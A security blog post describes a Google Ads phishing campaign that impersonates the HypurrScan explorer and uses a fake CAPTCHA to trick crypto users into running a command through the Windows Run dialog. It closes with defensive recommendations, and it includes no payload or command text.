While poking around Hyperliquid ecosystem tools — partly to amuse a crypto-obsessed colleague — we stumbled onto a phishing campaign that’s both simple and elegant: it uses Google Ads to serve malware to people searching for HypurrScan, the blockchain explorer for Hyperliquid.
What followed wasn’t a wallet-draining link or seed phrase scam. This was command execution via fake CAPTCHA, built into a spoofed Cloudflare page, targeting the exact kind of user likely to have crypto holdings.
The Attack Flow: Clean, Layered, and Deceptive
1. User searches for “Hypurrscan”
Google serves a sponsored ad — it looks legit: hypurrscan.io complete with metadata and branding.
2. Click leads to a phishing domain
The ad redirects to hypurrscan.net, a spoofed site mimicking the original. It loads a “Verify you are human” page.
3. Fake CAPTCHA loads distorted images
The site presents an AI-generated visual puzzle — designed not to validate anything, just to stall and engage the user.
Error triggers the real attack and phishing gets Hyperliquid
As you begin interacting, it throws an error and loads a new screen instructing you to complete manual verification:
The Payload: “Paste and Run“
This phishing kit applies a growing technique we’ve seen more frequently: the attacker tricks the user into launching a Windows Run dialog, pasting a preloaded command, and executing it — all under the guise of a verification step.
It’s elegant, because:
- It sidesteps browser-based protections entirely
- The victim runs the payload themselves
- It doesn’t need macros, downloads, or file execution to be effective
Typical outcomes from this approach include:
- Downloading and executing malware (e.g. infostealers, remote access tools)
- Setting persistence via shell:startup, scheduled tasks, or registry keys
- Establishing a connection back to attacker-controlled infrastructure
This is social engineering meets command execution, and it’s incredibly effective — especially against tech-savvy users who’ve learned to trust these kinds of browser prompts.
Why Hyperliquid?
The choice of HypurrScan as bait isn’t random. By buying ad placement on a niche blockchain explorer, attackers:
- Target users likely to hold crypto
- Top 10 Crypto and rising
- Know exactly which chain they’re active on (Hyperliquid)
- Can profile victims with high precision based on search intent
This is a surgical phishing funnel. Not broad spray-and-pray spam. It’s crafted for maximum relevance and conversion. And that’s how Phishing gets Hyperliquid! 😉
Recommendations
- Audit Your Brand in Search Results
Especially in crypto and Web3, search abuse is rampant. Regularly check for both organic and sponsored impersonation of your tools, explorers, and wallets. - Expand Security Awareness to Include Browser Phishing
Your users might know how to spot a fake email — but not a spoofed CAPTCHA or OS-level prompt. Train them to recognize these hybrid techniques. - Report and Monitor Ad Abuse
Google does take malicious ads down, but only if flagged. Use screenshots, network captures, and short descriptions when reporting. - Assume Targeted Intent
If your brand or tool is being impersonated, assume your users are being profiled. Phishing is no longer random — it’s intent-aware.
Final Note: The One That Got Away
Unfortunately, the phishing site was taken offline before we could collect the full payload. But based on the structure, behavior, and timing, it’s clear this wasn’t a sloppy one-off. It’s part of an ongoing evolution — phishing campaigns that borrow modern UI patterns, legit ad platforms, and user-triggered execution.
